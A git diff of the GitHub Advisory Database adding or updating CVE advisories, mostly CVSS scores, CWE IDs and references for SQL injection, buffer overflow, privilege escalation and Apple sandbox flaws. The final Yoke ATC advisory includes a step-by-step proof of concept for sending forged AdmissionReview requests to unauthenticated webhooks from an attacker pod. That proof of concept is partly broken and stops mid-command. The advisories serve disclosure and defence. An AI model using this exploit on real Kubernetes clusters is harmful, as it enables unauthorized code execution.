"WEB", + "url": "https://www.vulncheck.com/advisories/thesystem-servername-sql-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json index 1fadc75a8ff34..10c1a76535a4d 100644 --- a/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json +++ b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qjq9-mpcc-f8cr", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20677" ], "details": "A race condition was addressed with improved handling of symbolic links. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. A shortcut may be able to bypass sandbox restrictions.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-362" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qq4x-5chw-w95x/GHSA-qq4x-5chw-w95x.json b/advisories/unreviewed/2026/02/GHSA-qq4x-5chw-w95x/GHSA-qq4x-5chw-w95x.json new file mode 100644 index 0000000000000..b60d611af9acd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq4x-5chw-w95x/GHSA-qq4x-5chw-w95x.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq4x-5chw-w95x", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25345" + ], + "details": "Realtek IIS Codec Service 6.4.10041.133 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in the service configuration to inject malicious executables and escalate privileges on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25345" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47642" + }, + { + "type": "WEB", + "url": "https://www.realtek.com/en" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/rtk-iis-codec-service-rtkiscodec-unquote-service-path" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json b/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json index 77645a39946e4..4f846feafdaef 100644 --- a/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json +++ b/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qr83-6r38-ch55", - "modified": "2026-02-12T18:30:24Z", + "modified": "2026-02-12T21:31:27Z", "published": "2026-02-12T18:30:24Z", "aliases": [ "CVE-2025-70981" ], "details": "CordysCRM 1.4.1 is vulnerable to SQL Injection in the employee list query interface (/user/list) via the departmentIds parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T18:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qrx6-r62c-hcv3/GHSA-qrx6-r62c-hcv3.json b/advisories/unreviewed/2026/02/GHSA-qrx6-r62c-hcv3/GHSA-qrx6-r62c-hcv3.json new file mode 100644 index 0000000000000..7ec59db5efe34 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrx6-r62c-hcv3/GHSA-qrx6-r62c-hcv3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrx6-r62c-hcv3", + "modified": "2026-02-12T21:31:28Z", + "published": "2026-02-12T21:31:28Z", + "aliases": [ + "CVE-2025-70314" + ], + "details": "webfsd 1.21 is vulnerable to a Buffer Overflow via a crafted request. This is due to the filename variable", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70314" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Err0rzz/3afe49f54e1121b8a08a69801b61cfcc" + }, + { + "type": "WEB", + "url": "https://github.com/ourway/webfsd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8m3-w58q-qp9h/GHSA-r8m3-w58q-qp9h.json b/advisories/unreviewed/2026/02/GHSA-r8m3-w58q-qp9h/GHSA-r8m3-w58q-qp9h.json new file mode 100644 index 0000000000000..7cc03b834cc2e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8m3-w58q-qp9h/GHSA-r8m3-w58q-qp9h.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8m3-w58q-qp9h", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2026-26219" + ], + "details": "newbee-mall stores and verifies user passwords using an unsalted MD5 hashing algorithm. The implementation does not incorporate per-user salts or computational cost controls, enabling attackers who obtain password hashes through database exposure, backup leakage, or other compromise vectors to rapidly recover plaintext credentials via offline attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26219" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/119" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/newbee-mall-unsalted-md5-password-hashing-enables-offline-credential-cracking" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgrq-m353-3wqj/GHSA-rgrq-m353-3wqj.json b/advisories/unreviewed/2026/02/GHSA-rgrq-m353-3wqj/GHSA-rgrq-m353-3wqj.json new file mode 100644 index 0000000000000..b2830ac075ac2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgrq-m353-3wqj/GHSA-rgrq-m353-3wqj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgrq-m353-3wqj", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2025-67432" + ], + "details": "A stack overflow in the ZBarcode_Encode function of Monkeybread Software MBS DynaPDF Plugin v21.3.1.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67432" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Hyobin/818f52535929ec471d234bab67d94987" + }, + { + "type": "WEB", + "url": "https://gist.github.com/transparencybeam/818f52535929ec471d234bab67d94987" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rh68-c6m2-cjhj/GHSA-rh68-c6m2-cjhj.json b/advisories/unreviewed/2026/02/GHSA-rh68-c6m2-cjhj/GHSA-rh68-c6m2-cjhj.json new file mode 100644 index 0000000000000..e8f4270dab2e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rh68-c6m2-cjhj/GHSA-rh68-c6m2-cjhj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rh68-c6m2-cjhj", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25348" + ], + "details": "Computrols CBAS-Web 19.0.0 contains a boolean-based blind SQL injection vulnerability in the 'id' parameter that allows authenticated attackers to manipulate database queries. Attackers can exploit the vulnerability by crafting boolean-based SQL injection payloads in the 'id' parameter of the servers endpoint to extract or infer database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25348" + }, + { + "type": "WEB", + "url": "https://www.computrols.com/building-automation-software" + }, + { + "type": "WEB", + "url": "https://www.computrols.com/capabilities-cbas-web" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47631" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/cbas-web-id-boolean-based-blind-sql-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json b/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json index 235e7efcafc3d..f5670cee9ad5a 100644 --- a/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json +++ b/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rq5p-55rh-7hgc", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-62855" ], "details": "A path traversal vulnerability has been reported to affect File Station 5. If a local attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-w2vm-pjj6-6q8j/GHSA-w2vm-pjj6-6q8j.json b/advisories/unreviewed/2026/02/GHSA-w2vm-pjj6-6q8j/GHSA-w2vm-pjj6-6q8j.json new file mode 100644 index 0000000000000..36cc31e11fbf6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2vm-pjj6-6q8j/GHSA-w2vm-pjj6-6q8j.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2vm-pjj6-6q8j", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25343" + ], + "details": "NextVPN 4.10 contains an insecure file permissions vulnerability that allows local users to modify executable files with full access rights. Attackers can replace system executables with malicious files to gain SYSTEM or Administrator privileges through unauthorized file modification.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25343" + }, + { + "type": "WEB", + "url": "https://vm3max.site" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47831" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/nextvpn-insecure-file-permissions" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json b/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json index 98a97fff4f3e2..4c2b50e3e0138 100644 --- a/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json +++ b/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w6g5-6qxq-f96f", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54161" ], "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json b/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json index c1061dadb932d..adbadaed03ca4 100644 --- a/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json +++ b/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w82w-6f63-rvgf", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20678" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json b/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json index d4bd668c00534..bd22e95d325e6 100644 --- a/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json +++ b/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wqpg-jwpg-g42c", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20681" ], "details": "A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Tahoe 26.3. An app may be able to access information about a user's contacts.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json b/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json index e4bcb20273ae6..7abfd18bfc5da 100644 --- a/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json +++ b/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x4qx-g5c7-vgmf", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54169" ], "details": "An out-of-bounds read vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json b/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json index c789a92d3c5c2..4d2a00e6d7771 100644 --- a/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json +++ b/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x6mf-6c4h-p75j", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54155" ], "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5018 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json index 22181f9559544..767d768b5a160 100644 --- a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json +++ b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xw8j-p597-rjrj", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20680" ], "details": "The issue was addressed with additional restrictions on the observability of app states. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, iOS 26.3 and iPadOS 26.3. A sandboxed app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -37,7 +42,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:10Z" From 927858e3e4d76a6546c2dec3e97ec3cf50666424 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 22:07:32 +0000 Subject: [PATCH 049/215] Publish Advisories GHSA-965m-v4cc-6334 GHSA-w4gw-w5jq-g9jh GHSA-wj8p-jj64-h7ff --- .../GHSA-965m-v4cc-6334.json | 56 ++++++++++++++ .../GHSA-w4gw-w5jq-g9jh.json | 73 +++++++++++++++++++ .../GHSA-wj8p-jj64-h7ff.json | 57 +++++++++++++++ 3 files changed, 186 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w4gw-w5jq-g9jh/GHSA-w4gw-w5jq-g9jh.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json diff --git a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json new file mode 100644 index 0000000000000..d2ecb5f8b36fb --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-965m-v4cc-6334", + "modified": "2026-02-12T22:06:36Z", + "published": "2026-02-12T22:06:36Z", + "aliases": [ + "CVE-2026-26055" + ], + "summary": "Unauthenticated Admission Webhook Endpoints in Yoke ATC", + "details": "# Unauthenticated Admission Webhook Endpoints in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.\n\n**Recommended CWE**: CWE-306 (Missing Authentication for Critical Function)\n\n## Summary\n\nYoke ATC implements multiple Admission Webhook endpoints (`/validations/{airway}`, `/validations/resources`, `/validations/flights.yoke.cd`, `/validations/airways.yoke.cd`, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.\n\n## Details\n\nThe vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.\n\n**Vulnerable Endpoint Handlers** (`cmd/atc/handler.go:147-335`):\n```go\nmux.HandleFunc(\"POST /validations/{airway}\", func(w http.ResponseWriter, r *http.Request) {\n var review admissionv1.AdmissionReview\n if err := json.NewDecoder(r.Body).Decode(&review); err != nil {\n http.Error(w, fmt.Sprintf(\"failed to decode review: %v\", err), http.StatusBadRequest)\n return\n }\n // No authentication check - request is processed directly\n // ...\n})\n```\n\n**Additional Unauthenticated Endpoints**:\n- `/validations/resources` (`cmd/atc/handler.go:337-538`)\n- `/validations/external-resources` (`cmd/atc/handler.go:540-597`)\n- `/validations/airways.yoke.cd` (`cmd/atc/handler.go:599-636`)\n- `/validations/flights.yoke.cd` (`cmd/atc/handler.go:638-733`)\n- `/crdconvert/{airway}` (`cmd/atc/handler.go:61-145`)\n\nThe code lacks:\n1. TLS client certificate verification\n2. Request source validation (verifying requests come from kube-apiserver)\n3. Any form of authentication middleware\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat > /tmp/kind-config.yaml << 'EOF'\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\n**Step 4: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\n### Exploitation Steps\n\n**Step 1: Create attacker pod**\n```bash\nkubectl apply -f - < /tmp/malicious-review.json << 'EOF'\n{\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"kind\": \"AdmissionReview\",\n \"request\": {\n \"uid\": \"vul002-exploit-uid\",\n \"kind\": {\"group\": \"examples.com\", \"version\": \"v1\", \"kind\": \"Backend\"},\n \"resource\": {\"group\": \"examples.com\", \"version\": \"v1\", \"resource\": \"backends\"},\n \"name\": \"exploit-backend\",\n \"namespace\": \"default\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\"username\": \"attacker-from-pod\", \"groups\": [\"system:unauthenticated\"]},\n \"object\": {\n \"apiVersion\": \"examples.com/v1\",\n \"kind\": \"Backend\",\n \"metadata\": {\"name\": \"exploit-backend\", \"namespace\": \"default\"},\n \"spec\": {\"image\": \"nginx:latest\", \"replicas\": 1}\n }\n }\n}\nEOF\n\nkubectl cp 